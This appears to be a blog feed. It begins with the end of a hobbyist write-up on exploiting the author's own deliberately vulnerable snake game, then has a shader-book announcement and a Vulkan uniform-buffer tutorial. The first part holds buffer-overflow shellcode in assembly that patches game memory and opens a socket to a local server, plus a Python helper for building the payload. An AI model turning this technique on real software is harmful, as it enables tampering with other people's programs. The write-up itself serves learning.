<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_fixscore:
movabsq $0x000000000000419B, %rax # move location of score add instruction to rax
movb $0x0F, (%rax)</code></pre></figure>
<p>Similarly, I also took this time to write 42 back to our random seed variable:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_randomseed:
movabsq $0x00000000000096b0, %rax
movq $42, (%rax) # write 42 back to the random seed var</code></pre></figure>
<p>I should note that I’m providing labels in the assembly snippets above that I didn’t actually have in my assembly code, to aid readability. It’s a bit lengthy to paste right into the article, but my entire assembly payload up to this point looked like <a href="/images/post_images/2019-12-04/payloadv1.txt">this</a> (note the string of nop instructions I used to make reading lldb output easier). By now, manually changing null bytes to 0xCD in the machine code was getting tedious, so I wrote a small script to do that for me. My workflow now looked like this:</p>
<ol>
<li>Write some assembly</li>
<li>Assemble it with “as”</li>
<li>Get the machine code using Hex Fiend</li>
<li>Paste that into textedit and remove all whitespace</li>
<li>Use my script to swap null bytes for CD</li>
<li>Add the few bytes for overflowing the buffer / setting packetHandler to the end</li>
<li>Double check to make sure the resulting string was still the right size (add extra 0xCDs until it is)</li>
<li>Paste the code string into the python server</li>
<li>Run the server and the game.</li>
</ol>
<p>I probably should have combined a few more of those steps into a utility program, but it’s a bit late for that now.</p>
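<p>As a sketch of what such a utility might look like, the function below folds the null swap, the padding and the overflow bytes (steps 5 through 7) into one call. It is a hypothetical helper rather than the script used for this project, and it assumes the machine code has already been pulled out of the assembled binary as raw bytes.</p>

```python
EULA_LEN = 1024   # the code string has to fill the eula buffer exactly
MARKER = b"\xcd"  # stand-in for null bytes, also used as padding

# Bytes that follow the buffer: 4 for randomSeed, 4 of padding, then the two
# low bytes of the eula buffer address (0x92b0, little-endian).
OVERFLOW_TAIL = b"\x02" * 4 + b"\x03" * 4 + b"\xb0\x92"


def make_code_string(machine_code: bytes) -> bytes:
    """Turn raw machine code into the full string the server sends."""
    encoded = machine_code.replace(b"\x00", MARKER)  # step 5
    if len(encoded) > EULA_LEN:
        raise ValueError("payload does not fit in the eula buffer")
    padded = encoded.ljust(EULA_LEN, MARKER)         # step 7
    return padded + OVERFLOW_TAIL + b"\x00"          # step 6, plus terminator


if __name__ == "__main__":
    demo = make_code_string(bytes.fromhex("66bf2a00b8010000020f05"))
    print(len(demo), demo[:11].hex())
```

<p>Padding with 0xCD mirrors the manual workflow; once the bootstrap has run, those padding bytes become zeros.</p>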
<p>At this point, I had successfully managed to change the score value for targets in the game, and was feeling pretty super. However, that wasn’t enough for me to be satisfied that I had actually recreated the entire gamasutra story, so there was still more work to do.</p>
<h2 id="downloading-a-real-eula">Downloading a Real EULA</h2>
<p>Up to now, when the game displayed the EULA, it ended up displaying garbage bytes, because the eula buffer contained our code string. I wanted to fix that by having the payload include instructions for downloading a real EULA string from the server. The original story also mentioned having the payload download additional data, although technically it reads like they downloaded more machine code… I’m not going to split hairs.</p>
<p>Setting up a socket connection in assembly isn’t super exciting, given that socket(), connect(), and recvfrom() are all syscalls on OS X, so there’s nothing exotic about it really. I had so far gotten by without allocating any stack variables (and as such, needing to clean those up), so I ended up reserving the last chunk of the eula buffer to use to store the sockaddr structure I was using, but that’s about as weird as it got. I also hardcoded the values of the sockaddr struct (by writing a C program to set it up and just copying the bytes from the sockaddr struct it created) rather than calculating them the normal way to save some time. Setting all this up looked like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_SetUpSocket:
movl $0x2000061, %eax # 61 is socket
movq $2, %rdi # first socket arg - AF_INET
movq $1, %rsi # second socket arg - SOCK_STREAM
movq $0, %rdx # third socket arg - protocol
syscall # call socket, socket handle in eax
movq %rax, %rdi # move socket handle to rdi, the first arg to connect
movl $0x2000062, %eax # next syscall will be to connect
movabsq $0x00000000000096a1, %rsi
movb $2, (%rsi) # now write the sockaddr bytes
add $1, %rsi
movb $0x27, (%rsi)
add $1, %rsi
movb $0x15, (%rsi)
add $1, %rsi
movq $0x7f, (%rsi)
add $3, %rsi
movq $1, (%rsi)
movabsq $0x00000000000096a0, %rsi # second arg to connect is address of sockaddr struct, located in our buffer (pre-zeroed by bootstrap)
movq $16, %rdx # third arg is len of sockaddr
syscall</code></pre></figure>
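<p>The hardcoded bytes are easier to follow next to the struct layout. The sketch below packs a BSD-style sockaddr_in (one length byte, one family byte, a big-endian port, the IPv4 address, then eight bytes of padding) in Python. The helper name is hypothetical, and the length byte defaults to zero here because the assembly above starts writing at the second byte and leaves the first one as it was.</p>

```python
import socket
import struct

AF_INET = 2  # address family value written by the assembly


def bsd_sockaddr_in(ip: str, port: int, sin_len: int = 0) -> bytes:
    """Pack a 16 byte BSD sockaddr_in: len, family, port, address, zero pad."""
    # "!" means network byte order with no alignment padding;
    # "8x" appends the eight zero bytes of sin_zero.
    return struct.pack("!BBH4s8x", sin_len, AF_INET, port, socket.inet_aton(ip))


if __name__ == "__main__":
    raw = bsd_sockaddr_in("127.0.0.1", 10005)
    print(len(raw), raw.hex())
```

<p>Reading the result byte by byte lines up with the movb/movq writes: 0x02 for the family, 0x27 0x15 for the port, then 0x7f and a trailing 0x01 for 127.0.0.1.</p>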
<p>Since I wanted to download the new EULA string into the same buffer that the payload code currently lived in, I ended up adding a huge string of NOP instructions before calling recvfrom, and limiting the size of the EULA string so that it wouldn’t stomp on instructions that still mattered. So immediately after the code above, there was a long string of 700 NOP instructions before I actually called recvfrom and then returned from the function. This last bit of assembly looked like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">_downloadeula:
movl $0x200001D, %eax # next syscall will be to recvfrom
movabsq $0x00000000000092b0, %rsi # second arg is address of this buffer
movq $512, %rdx # third arg is len, eula will be up to 512 bytes
movq $0x0, %r10 # fourth arg is flags
movq $0x0, %r8 # fifth arg is socket ptr, use null since we have a connected socket
movq $0x0, %r9 # ignore
syscall
ret </code></pre></figure>
<p>If you’re curious, the entire source for this payload is both <a href="/images/post_images/2019-12-04/payload_final.txt">here</a> and on the <a href="https://github.com/khalladay/InsecureSnake">github project</a> that accompanies this blog post. Note that the payload code doesn’t exactly match the code string in the final python server script, since I was manually adding padding and replacing some NOPs with 0xCD, as described earlier.</p>
<p>With this payload in place, getting a proper EULA was just a matter of adding a few more lines to the server script to listen for a connection on port 10005 and send back the string when it received that connection. You can see the final server script <a href="/images/post_images/2019-12-04/ServerV3.txt">here</a> if you’re curious. Once that was working, I could send a EULA that was human readable to the client in time to hide the fact that anything nefarious was going on, and my server was able to modify compiled code using a buffer overflow. Woohoo!</p>
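<p>The real script is linked above. As a rough idea of the shape of those extra lines, a minimal version might look like the sketch below. The names are hypothetical, and the trailing null byte is an assumption (that the game displays the buffer as a C string), not something taken from the real server.</p>

```python
import socket

EULA_PORT = 10005  # port encoded in the payload's sockaddr bytes (0x27 0x15)
MAX_EULA = 512     # the payload's recvfrom call reads at most 512 bytes


def eula_bytes(text: str) -> bytes:
    """Clamp the EULA so that, with its terminator, it fits in MAX_EULA bytes."""
    data = text.encode("ascii")[: MAX_EULA - 1]
    return data + b"\x00"  # assumed: the game treats the buffer as a C string


def serve_eula_once(listener: socket.socket, text: str) -> None:
    """Accept one connection on an already listening socket and send the EULA."""
    conn, _addr = listener.accept()
    with conn:
        conn.sendall(eula_bytes(text))


if __name__ == "__main__":
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", EULA_PORT))
        listener.listen(1)
        serve_eula_once(listener, "Totally legitimate EULA text.")
```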
<div align="center">
<img src="/images/post_images/2019-12-04/victory_dance.gif" />
</div>
<h2 id="conclusion--references">Conclusion / References</h2>
<p>This was a super cool project to work on, despite it occasionally taking a turn for the very tedious. I learned a ton about areas of programming that I had never had a chance to dabble in before, and feel like I came away from it with a better understanding of how software works in general.</p>
<p>Given how little I knew when I started this, I used a <em>ton</em> of different blog posts and articles to help get me up to speed (in addition to the ones linked explicitly above), and I wanted to list them here in case any are of interest to anyone else. So, in no specific order, here they are:</p>
<ul>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#linex1">http://www.vividmachines.com/shellcode/shellcode.html#linex1</a></li>
<li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882</a></li>
<li><a href="https://0xrick.github.io/binary-exploitation/bof1/">https://0xrick.github.io/binary-exploitation/bof1/</a></li>
<li><a href="https://www.thegeekstuff.com/2013/06/buffer-overflow/">https://www.thegeekstuff.com/2013/06/buffer-overflow/</a></li>
<li><a href="https://securiteam.com/securityreviews/5OP0B006UQ/">https://securiteam.com/securityreviews/5OP0B006UQ/</a></li>
<li><a href="https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope">https://www.slideshare.net/gotohack/security-offense-and-defense-strategies-videogame-consoles-architecture-under-microscope</a></li>
<li><a href="https://shanetully.com/2013/12/writing-a-self-mutating-x86_64-c-program/">https://shanetully.com/2013/12/writing-a-self-mutating-x86_64-c-program/</a></li>
<li><a href="https://stackoverflow.com/questions/4812869/how-to-write-self-modifying-code-in-x86-assembly">https://stackoverflow.com/questions/4812869/how-to-write-self-modifying-code-in-x86-assembly</a></li>
<li><a href="https://stackoverflow.com/questions/50673522/10-13-high-sierra-osx-python-mprotect-always-fails-when-granting-exec-permissi">https://stackoverflow.com/questions/50673522/10-13-high-sierra-osx-python-mprotect-always-fails-when-granting-exec-permissi</a></li>
<li><a href="https://developer.apple.com/library/archive/qa/qa1788/_index.html">https://developer.apple.com/library/archive/qa/qa1788/_index.html</a></li>
<li><a href="https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/">https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/</a></li>
</ul>
<p>I also want to link again to <a href="https://www.hopperapp.com/">Hopper</a> and <a href="https://ridiculousfish.com/hexfiend/">Hex Fiend</a>, which made my life way easier. Hopper in particular is a really impressive bit of software, and I hope I get an excuse to use it again in the future.</p>
<p>If you want to say hi, or ask any questions about anything in the article, I’m available (sporadically) <a href="https://twitter.com/khalladay">on Twitter!</a> Thanks for reading!</p>
I Wrote A Book About Shaders!2019-04-18T00:00:00+00:00http://kylehalladay.com/blog/2019/04/18/I-Wrote-A-Book<p>From the looks of my blog archive, it’s been 13 months since I dropped off the map and stopped posting. That’s because around that time I got an e-mail from Apress Books asking if I wanted to write for them. I’ve gotten several messages like this since I started writing my blog, but this one was different in two key ways:</p>
<ol>
<li>They didn’t have a book idea in mind already, instead, they wanted to know what I might like to write.</li>
<li>Their sales pitch was “you’re already writing about technical things, why not get paid for it?” which I found pretty convincing.</li>
</ol>
<p>So I replied to the e-mail, and pretty quickly I decided that I wanted to write a book with them, and now you can purchase that book (<a href="https://www.amazon.com/Practical-Shader-Development-Fragment-Developers/dp/1484244567">Amazon link</a>)! The schtick of it is that it’s an example-based approach to learning shaders. If you’ve never written a shader before, and want to get your feet wet and learn a few things without necessarily needing to learn a ton of math or graphics API details, this is the book for you. It’s not super technical, it’s really more about having some fun and building a bunch of different things.</p>
<div align="center">
<img src="/images/post_images/2019-04-18/book_cover.JPG" />
Here's what it looks like!
<br /><br />
</div>
<p>It’s kind of surreal to be holding a physical copy of this thing. Both because it’s the first physical thing that I’ve produced in my career, and because I can’t believe this project is finally finished. So to celebrate, here’s a disorganized collection of thoughts I have about the whole experience.</p>
<h2 id="writing-a-book-is-hard-work">Writing A Book Is Hard Work</h2>
<p>When I started this project I honestly didn’t think it was going to be that much different from regularly writing blog posts. Having now done both, let me say very clearly that <strong>writing a book is nothing like writing blog posts</strong>. Not only do blog posts not have deadlines, but they can jump around, and can assume any level of ability on the part of your readers, and you can always delete or edit a blog post if you get something wrong. Writing a book is 1000% harder than writing a blog.</p>
<p>There were a lot of days that I didn’t feel like writing. Hell, there were a lot of weeks where I didn’t feel like writing. When people asked how writing was going, my standard answer was “the fun runs out after page 100,” which, depending on the day, was either just a funny default response, or painful truth. I’m completely convinced that books are mostly written out of pure stubbornness, and that the people who write books aren’t necessarily the most qualified people to write about that topic, but they are perhaps the most qualified people to write about that topic that feel like finishing a book.</p>
<h2 id="finishing-a-book-is-scary">Finishing A Book Is Scary</h2>
<p>Speaking of finishing a book, that’s a scary proposition in itself. By the time things were done, I was both relieved to be done writing and terrified at how many things I knew that I would change if I had more time to work on the project. Now I’m just hoping that there aren’t any huge and embarrassing content mistakes that slipped through the cracks.</p>
<p>Just like making games, having a final deadline where you have to ship the thing is probably the only way that a lot of books ever see the light of day. Without that, by the time I felt ready to publish we’d all be rendering things with quantum computers that path trace on the blockchain, and the book wouldn’t be relevant any more. So instead, I’ve just had to come to grips with the fact that the book isn’t perfect, but it’s <strong>done</strong>, and that’s ok.</p>
<h2 id="finishing-a-book-is-pretty-great-too">Finishing A Book Is Pretty Great Too</h2>
<p>Despite all my complaining, getting the copies of my book in the mail was pretty amazing. Actually finishing the project and seeing the end result has been hugely rewarding, and I’m really glad that I stuck with things until the end. Hopefully people like the book, but even just following through on a large personal project is a great feeling.</p>
<h2 id="apress-was-pretty-great-to-work-with">Apress Was Pretty Great To Work With</h2>
<p>There are lots of horror stories floating around about working with publishers like Packt or Apress, but I have a lot of good things to say about them. The folks that I talked to day to day were professional, easy to work with, and always accommodating when I needed to move a chapter deadline because work was going crazy (I’m a stickler for schedules and deadlines, so they may have been flexible because this only happened a couple of times). They also paid me on time, which seems to be a common thing that other people complain about with technical book publishers.</p>
<p>I was a bit surprised at how little the copy editing team there corrected my grammar and sentence structure, but given how many other mistakes they caught that would have been disastrous to actually print in a book, I can’t say I’m too upset about it. It’s not like I was writing the next great Canadian novel. I also didn’t express this concern to Apress during the copy editing phase of the book, so this is also on me.</p>
<h2 id="i-dont-want-to-write-for-a-while">I Don’t Want To Write For A While</h2>
<p>I think it’s fair to say that I’m a bit burnt out on writing right now. Even though it’s been a few months since I’ve had to do a lot of writing for the book, I still don’t have much desire to start writing blog posts again, and I think I’m going to write a lot less this year in general. Instead, I want to spend more time learning new things and working on things that don’t necessarily translate into a good blog post. Hopefully by the time I feel like writing again, I’ll have some new, interesting things to share.</p>
<p>Hopefully some of you pick up the book and learn a thing or two! In the meantime, I’m always available to chat <a href="https://twitter.com/khalladay">on Twitter</a>. If you want to make my day, shoot me a message if you grab a copy. Have a good one!</p>
A "Bind Once" Approach to Uniform Data2018-02-05T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2018/02/05/Bind-Once-Uniform-Data-Vulkan<p>After figuring out how to use a global <a href="http://kylehalladay.com/blog/tutorial/vulkan/2018/01/28/Textue-Arrays-Vulkan.html">array of textures</a> to store all the textures that are in use for a frame in a single descriptor set, I returned to my <a href="https://github.com/khalladay/VkMaterialSystem">material system project</a> and realized how much easier life would be if I could do all my descriptor set binding at the beginning of a frame, both because I’d avoid any performance overhead from doing lots of binding, and because it greatly simplifies anything related to descriptor set versioning (or dealing with updating buffers that are in flight).</p>
<p>As it turns out, this is totally possible and really easy to do, although I have no idea if it’s a good idea in the grand scheme of things. Also, just like using an array of textures, I couldn’t find anyone else writing about it, so I guess that means it’s on me to share.</p>
<div align="center">
<img src="/images/post_images/2018-02-05/badideas.jpg" />
<br /><br />
</div>
<p>So with all that said, this post is going to show off how to use a single, globally bound descriptor set (and a single VkBuffer!) to store all the uniform data needed for multiple objects that are using different shaders.</p>
<p>I’ve set all this up in a demo project (<a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/UniformBufferArrays">on github</a>) if you just want the code. The fragment shaders I used in that demo are:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="k">struct</span> <span class="n">Data48</span>
<span class="p">{</span>
<span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorC</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">DATA_48</span>
<span class="p">{</span>
<span class="n">Data48</span> <span class="n">testing</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="p">}</span><span class="n">data</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">dataIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorA</span>
<span class="o">+</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorB</span>
<span class="o">+</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorC</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>and</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="k">struct</span> <span class="n">Data48</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">r</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">DATA_48</span>
<span class="p">{</span>
<span class="n">Data48</span> <span class="n">data</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="p">}</span><span class="n">data</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">dataIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">red</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">r</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">intCast</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">x</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorA</span> <span class="o">=</span> <span class="n">vec4</span><span class="p">(</span><span class="n">red</span><span class="p">,</span> <span class="n">intCast</span><span class="p">,</span> <span class="n">intCast</span><span class="p">,</span> <span class="n">intCast</span><span class="p">);</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorB</span> <span class="o">*</span> <span class="n">colorA</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’ll omit the vert shader because it just passes through uv coords and does nothing fancy. The stars of our show are the ones above.</p>
<h2 id="how-this-all-works">How This All Works</h2>
<p>The trick, which you may have already guessed from the shader code, is to keep all the uniform buffer objects the same size. VkDescriptorSets and VkBuffers don’t actually care about the contents of your uniform buffers, otherwise we’d have to provide a lot more information when setting up a descriptor set binding. All they care about is how big the buffer needs to be.</p>
<p>Knowing that, it follows that if all our shaders are using buffers of the same size, they should all be able to use the same descriptor set, and that’s exactly how things work in practice. It’s almost embarrassing how easy it is to set up the descriptor set layout to do this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorSetLayoutBinding</span> <span class="n">layoutBinding</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_FRAGMENT_BIT</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">pImmutableSamplers</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">VkDescriptorSetLayoutCreateInfo</span> <span class="n">layoutInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO</span><span class="p">;</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">bindingCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">pBindings</span> <span class="o">=</span> <span class="o">&</span><span class="n">layoutBinding</span><span class="p">;</span>
<span class="n">vkCreateDescriptorSetLayout</span><span class="p">(...)</span></code></pre></figure>
<p>You don’t even need to worry about specifying the number of elements in the array, since it’s all stored in a uniform block. As far as the descriptor set is concerned, we’re not even using an array.</p>
<p>Once you’ve set up your Descriptor Set Layout, allocating the buffer to store the data is similarly easy. I’m going to just copy + paste the utility function call from my demo project, because allocating a buffer and memory associated with it in Vulkan has a lot of boilerplate, but in reality, all you do is create a buffer large enough to hold the array you declared. So if you have an array of length 8 that stores 48 byte structures, your buffer needs to be 8 * 48 (384) bytes large.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">vkh</span><span class="o">::</span><span class="n">createBuffer</span><span class="p">(</span><span class="n">demoData</span><span class="p">.</span><span class="n">sharedBuffer</span><span class="p">,</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">bufferMemory</span><span class="p">,</span>
<span class="n">SHARED_UNIFORM_SIZE</span> <span class="o">*</span> <span class="n">BUFFER_ARRAY_SIZE</span><span class="p">,</span>
<span class="n">VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT</span> <span class="o">|</span> <span class="n">VK_BUFFER_USAGE_TRANSFER_DST_BIT</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span><span class="p">,</span>
<span class="n">appContext</span><span class="p">);</span></code></pre></figure>
<p>And finally, once you’ve put the data into that buffer, writing the descriptor set is also about as straightforward as possible.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">VkDescriptorBufferInfo</span> <span class="n">bufferInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">buffer</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">sharedBuffer</span><span class="p">;</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">range</span> <span class="o">=</span> <span class="n">VK_WHOLE_SIZE</span><span class="p">;</span>
<span class="n">VkWriteDescriptorSet</span> <span class="n">setWrite</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstBinding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstArrayElement</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstSet</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorSet</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">pBufferInfo</span> <span class="o">=</span> <span class="o">&</span><span class="n">bufferInfo</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">pImageInfo</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">vkUpdateDescriptorSets</span><span class="p">(</span><span class="n">appContext</span><span class="p">.</span><span class="n">device</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">setWrite</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">nullptr</span><span class="p">);</span></code></pre></figure>
<p>This setup is completely identical to setting up a single uniform buffer object, because in practice, that’s exactly what’s going on. The only difference is that to make this work you have to keep a few more things in mind:</p>
<h2 id="ensuring-buffers-are-the-same-size">Ensuring Buffers Are The Same Size</h2>
<p>I’ve already covered that you need to keep the uniform objects the same size, but how to do that is a bit different for Vulkan than it might be if you were working with solely cpu side structs. This is because every struct member in the shaders above ends up on a 16 byte boundary (uniform blocks default to the std140 layout rules, which align vec4s to 16 bytes), which means that if you’re trying to manually specify the structs in your c++ code (like I do in my example project), you need to add some additional syntax to make sure it all adds up properly:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">LayoutA</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorC</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">LayoutB</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="kt">float</span> <span class="n">r</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>Unless you’re working with matrices, this actually ends up making your life easier, because any data type equal to or smaller than the size of a vec4 will fit inside 16 bytes, meaning that rather than worrying about the size of the struct members, you just worry about keeping the count the same. Once you add matrices, you have to start looking at sizes again.</p>
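<p>If you’d rather not rely on the MSVC-only <code>__declspec(align(16))</code>, a minimal sketch of the same idea with standard <code>alignas</code> might look like the following. The <code>Vec4</code> type is a stand-in for <code>glm::vec4</code> so the snippet compiles on its own, and the <code>static_assert</code>s are my addition, not something from the demo project. Keep in mind that padding every member out to 16 bytes only matches the shader when the GLSL members really do land on 16 byte boundaries, as they do in the two shaders above.</p>

```cpp
#include <cstddef> // offsetof, std::size_t

// Stand-in for glm::vec4 so this sketch compiles without GLM (assumption).
struct Vec4 { float x, y, z, w; };

// Same layouts as above, using standard alignas instead of __declspec(align).
struct LayoutA
{
    alignas(16) Vec4 colorA;
    alignas(16) Vec4 colorB;
    alignas(16) Vec4 colorC;
};

struct LayoutB
{
    alignas(16) float r;
    alignas(16) Vec4  colorA;
    alignas(16) int   x;
};

// Size of one array element, matching the Data48 struct in the shaders.
constexpr std::size_t SHARED_UNIFORM_SIZE = 48;

// Fail the build if a layout stops matching the shared slot size.
static_assert(sizeof(LayoutA) == SHARED_UNIFORM_SIZE, "LayoutA must be 48 bytes");
static_assert(sizeof(LayoutB) == SHARED_UNIFORM_SIZE, "LayoutB must be 48 bytes");

// Each member of LayoutB starts on its own 16 byte boundary.
static_assert(offsetof(LayoutB, colorA) == 16, "colorA should start at byte 16");
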